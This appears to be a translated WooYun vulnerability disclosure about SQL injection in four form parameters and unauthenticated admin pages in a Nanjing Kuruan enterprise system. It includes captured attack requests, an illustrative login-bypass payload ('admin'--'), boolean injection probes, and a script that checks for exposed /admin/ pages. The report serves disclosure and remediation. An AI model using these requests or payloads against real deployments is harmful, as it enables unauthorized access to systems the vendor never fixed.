
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0145232
Title: An enterprise management system with four SQL injection points and multiple unauthorized-access pages
Vendor: 南京酷软软件有限公司 (Nanjing Kuruan Software Co., Ltd.)
Author: 路人甲
Submitted: 2015-10-10 11:29
Fix time: 2015-11-24 11:30
Disclosed: 2015-11-24 11:30
Vulnerability type: Design flaw / logic error
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be contacted, or the vendor actively ignored the report
Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-11-24: The vendor has chosen to ignore the vulnerability; details disclosed to the public.

Brief description:

As the title says.

Detailed description:

Issues found: 4 SQL injection points and unauthorized access to multiple system pages (none of them require login). The requests below were captured against a test instance; the hosts are masked.
Injection 1:

POST /login.aspx HTTP/1.1
Content-Length: 330
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
loginSubmit=&ckbIsSave=on&password=g00dPa%24%24w0rD&randomData=&signedData=&txt_verify=g00dPa%24%24w0rD&username=admin&__VIEWSTATE=/wEPDwUKLTg1Mjc0MDQzNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWNrYklzU2F2ZWvEIdmbjPScY/cv4tJUXwzvI4cqqgA7uf89XFgMLZrY&__VIEWSTATEGENERATOR=C2EE9ABB


Injectable parameter: username
Injection 2:

POST /admin/glassmanager.aspx?ModelType=edit&page=1&PID=40 HTTP/1.1
Content-Length: 742
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnSearch=%e6%9f%a5%e8%af%a2&hidGrainID=40&txtGlasscode=%e5%8d%95%e9%9d%a2%e6%9c%a8%e6%a0%bc%e4%b8%80%e9%9d%a2%e7%99%bd%e7%8e%bb%e4%b8%80%e9%9d%a2%e5%b8%83%e7%ba%b9&txtGlassCodeForSearch=123&txtGlassName=40&txtGlassNameForSearch=ocljxusc&txtGlassprice=0&__EVENTVALIDATION=/wEdAAnKjHjs2vZ0ShC9zkxI0y4pW4pIN1KIEEsGHukofKCPKC8Au989bZBKED75joowesJSc2ZfrrLnksUmxqYJhYUi/f7hXxuj%2b9RdyEo8/nBf7eFPbBA2nrvZZ4n1DcerbfyIoPAi2xR6UPghNedlm6QFjtTdVzRZn7DFyWrI8V/OY2i3LqZOTKDGsjhJxkmxGp3YmfZmy9iDaVXQJLmwxxmBmae%2bTZLodyGOGWayPROPQQ%3d%3d&__VIEWSTATE=/wEPDwUKLTg4ODI0MDA4MQ9kFgICAw9kFgICAw8PFgIeBFRleHQFBuabtOaWsGRkZKbZg3eBuE8TxE7glDEEswRszq1lBWF0%2bHnGfQYZ%2bfAE&__VIEWSTATEGENERATOR=61268597


Injectable parameters: txtGlassNameForSearch and txtGlassCodeForSearch
Injection 3:

POST /admin/function/functionmanage.aspx HTTP/1.1
Content-Length: 553
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ButAddFunction=%e6%b7%bb%e5%8a%a0&hidFunctionID=&TextFunctioncode=1&TextFunctionName=qeksviyy&TextFunctionpath=1&__EVENTVALIDATION=/wEdAAYwN3zyZaSJTHn8Ah/SC99I%2bLDo9dAznYnoFSF/78GxrPudp1MFazkgrxYIHSRoS4WM6vkbVh5TFLI8yCGtM2QBufd%2b2kIoS6kOXl%2blwxtK1NN8MV13sGeMpCG0koNNyNDuphDsjuVlO1wXx3SFbjr/Lks0UBPjPRPDSa8BVmo8Cw%3d%3d&__VIEWSTATE=/wEPDwUKLTE0NTk4NzI2MQ9kFgICAw9kFgYCBw8PFgIeB1Zpc2libGVoZGQCCQ8PFgIfAGhkZAINDxYCHgtfIUl0ZW1Db3VudGZkZPipjuIJPjUXAvu9jJCh2U3OEQzJDlv5sIyr/YQ7vkQn&__VIEWSTATEGENERATOR=4F298C76


Injectable parameter: TextFunctioncode
Injection 4:

POST /admin/colormanager.aspx?page=2 HTTP/1.1
Content-Length: 458
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
BtnSeasrch=%e6%9f%a5%e8%af%a2&hidGrainID=0&txtCode=1&txtName=imjtmjdm&__EVENTVALIDATION=/wEdAAaOTLJrE1GkP3p9NL%2bgg%2blJozoJZpuXxkpOVJKRbHyuHoVrfPTZCZCdgWOPfArF%2bOv9/uFfG6P71F3ISjz%2bcF/tZRy0t362Wd2hZI98BfBb/2i3LqZOTKDGsjhJxkmxGp2NkRG0i6Gt/nSjTU0ov%2bJK4bHomrKhYXFOuwfglto8CA%3d%3d&__VIEWSTATE=/wEPDwUKMTk4MzU1NTA4NWRkglpP/rm817U8YnqbLrVrtnV9Fpc/WrQXbpNXW35owQM%3d&__VIEWSTATEGENERATOR=C550A4E8


Injectable parameters: txtCode and txtName
Unauthorized access (no login required) on multiple system pages:
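The four findings above share one root cause: a form value is concatenated into the SQL text of a login or search handler. The following example, added for this write-up and not taken from the vendor's ASP.NET code, shows that pattern next to its parameterized form and the non-destructive true/false probe a tester uses to confirm a search-field injection without touching data. The table, column names and accounts are constructed, and SQLite stands in for the real database engine.

```python
"""
Constructed illustration of the bug class behind the four injection points:
user input concatenated into the SQL string of a login and a search handler,
next to the parameterized form of each. Not the vendor's code; the table,
columns and accounts are assumptions and SQLite stands in for the real engine.
"""
import sqlite3
from typing import Callable, Optional


def make_db() -> sqlite3.Connection:
    """In-memory table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!Pass"), ("clerk", "clerk123")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str) -> Optional[str]:
    """The pattern behind the login.aspx 'username' finding: the quotes that
    delimit the value are part of the program text, so a quote in the input
    ends the string and whatever follows is executed as SQL."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username: str, password: str) -> Optional[str]:
    """Same query with bound parameters: the value travels separately from the
    SQL text and cannot change its structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def search_vulnerable(conn, name: str) -> int:
    """A search handler built the same way, mirroring the txtName and
    txtGlassNameForSearch style parameters in the report."""
    sql = "SELECT COUNT(*) FROM users WHERE username LIKE '%" + name + "%'"
    return conn.execute(sql).fetchone()[0]


def search_parameterized(conn, name: str) -> int:
    """The wildcard is added to the bound value, not to the SQL text."""
    return conn.execute(
        "SELECT COUNT(*) FROM users WHERE username LIKE ?", ("%" + name + "%",)
    ).fetchone()[0]


def boolean_probe(search: Callable[[str], int], value: str) -> bool:
    """Non-destructive confirmation of a search-field injection: appending an
    always-true predicate must leave the result unchanged, appending an
    always-false one must change it. The trailing AND '%'=' re-closes the
    quote and wildcard that the handler appends, so the SQL stays well-formed.
    A value with no baseline hit proves nothing and yields False."""
    baseline = search(value)
    true_case = search(value + "%' AND '1'='1' AND '%'='")
    false_case = search(value + "%' AND '1'='2' AND '%'='")
    return true_case == baseline and false_case != baseline


if __name__ == "__main__":
    db = make_db()
    # The comment sequence discards the password check entirely.
    print(login_vulnerable(db, "admin'--", "anything"))
    print(login_parameterized(db, "admin'--", "anything"))
    print(boolean_probe(lambda v: search_vulnerable(db, v), "adm"))
    print(boolean_probe(lambda v: search_parameterized(db, v), "adm"))
```

The probe compares three responses rather than looking for an error message, which is why it also works against handlers that swallow database exceptions; it is the same logic a tool such as sqlmap applies in boolean-based mode.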

/admin/colormanager.aspx
/admin/cad/cadmodelrelation.aspx
/admin/cad/cadbaserelationship.aspx
/admin/flash/resourcemanager.aspx
/admin/flash/scenecatatorymanager2.aspx
/admin/flashmanage.aspx
Not every affected page is listed.
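To reproduce or re-check the unauthorized-access finding after a fix, each of the listed /admin/ pages should be requested with no session cookie and the answer classified: a redirect to login.aspx, a 401/403, or a rendered login form means the page is protected; a 200 with the page's own content means it is still exposed. The script below, added for this write-up and not part of the original report, does exactly that. The host is a placeholder, the demo responses are constructed, and the markers used to recognise a rendered login form (a form posting to login.aspx and the txt_verify field seen in the login request above) are assumptions about this application.

```python
"""
Added check for the unauthenticated-access finding: request each /admin/ page
with no cookies, do not follow redirects, and report whether it was served.
Not part of the original report; host, demo responses and login-form markers
are constructed assumptions.
"""
import sys
import urllib.error
import urllib.request
from dataclasses import dataclass, field
from typing import Callable, Dict, List
from urllib.parse import urljoin, urlparse

# Pages the report lists as reachable without login.
ADMIN_PATHS = [
    "/admin/colormanager.aspx",
    "/admin/cad/cadmodelrelation.aspx",
    "/admin/cad/cadbaserelationship.aspx",
    "/admin/flash/resourcemanager.aspx",
    "/admin/flash/scenecatatorymanager2.aspx",
    "/admin/flashmanage.aspx",
]


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


def classify(resp: Response) -> str:
    """'protected' for a redirect to login.aspx, a 401/403, or a rendered
    login form; 'exposed' when the page itself came back with 200."""
    if resp.status in (301, 302, 303, 307, 308):
        location = resp.headers.get("Location", "")
        if urlparse(location).path.lower().endswith("login.aspx"):
            return "protected"
        return "redirect:" + location
    if resp.status in (401, 403):
        return "protected"
    if resp.status == 200:
        body = resp.body.lower()
        # Some WebForms apps render the login page with 200 instead of a 302.
        if 'action="login.aspx"' in body or 'name="txt_verify"' in body:
            return "protected"
        return "exposed"
    return "status:%d" % resp.status


def audit(base_url: str, paths: List[str],
          fetch: Callable[[str], Response]) -> Dict[str, str]:
    """Map each path to its verdict. fetch() must send no cookies and must not
    follow redirects, otherwise the Location header is lost."""
    return {p: classify(fetch(urljoin(base_url, p))) for p in paths}


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # surface the 3xx to the caller instead of following it


def http_fetch(url: str, timeout: float = 10.0) -> Response:
    """Live fetcher: standard library only, no cookies, redirects not followed."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "admin-auth-audit/1.0"})
    try:
        with opener.open(req, timeout=timeout) as r:
            return Response(r.status, dict(r.headers), r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:  # raised for every non-2xx, including 3xx
        return Response(e.code, dict(e.headers), e.read().decode("utf-8", "replace"))


def demo_results() -> Dict[str, str]:
    """Offline run over constructed responses: one page served, one bounced."""
    canned = {
        "/admin/colormanager.aspx": Response(
            200, {}, '<form method="post" action="colormanager.aspx?page=2">'
                     '<input name="txtCode"><input name="BtnSeasrch"></form>'),
        "/admin/flashmanage.aspx": Response(
            302, {"Location": "/login.aspx?ReturnUrl=%2fadmin%2fflashmanage.aspx"}),
    }

    def fake_fetch(url: str) -> Response:
        return canned.get(urlparse(url).path, Response(404))

    return audit("http://192.0.2.10:88", list(canned), fake_fetch)


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.10:88"
    for path, verdict in audit(base, ADMIN_PATHS, http_fetch).items():
        print("%-45s %s" % (path, verdict))
```

Run it as `python3 audit.py http://host:88`; every line that reads `exposed` is a page the server rendered for an anonymous client. The fetcher deliberately disables redirect following, because a client that follows the 302 to login.aspx would see a 200 login page for every path and the result would say nothing about which pages are actually guarded.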

Proof of vulnerability:

The 4 SQL injections:

[5 screenshots of the injection results; images not preserved]


Unauthorized access to multiple system pages:

[3 screenshots; images not preserved]


Affected instances (hosts masked in the original):

**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:8088/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx

Fix recommendation:

Contact the vendor. The standard remediation for the two bug classes above is to bind every user-supplied value as a query parameter instead of concatenating it into the SQL text, and to enforce an authentication check on every page under /admin/, for example with a <location path="admin"> authorization rule in web.config that denies anonymous users.

Copyright notice: when reposting, credit the source 路人甲@乌云 (WooYun).


Vulnerability response

Vendor response:

Vendor could not be reached, or the vendor actively declined the report.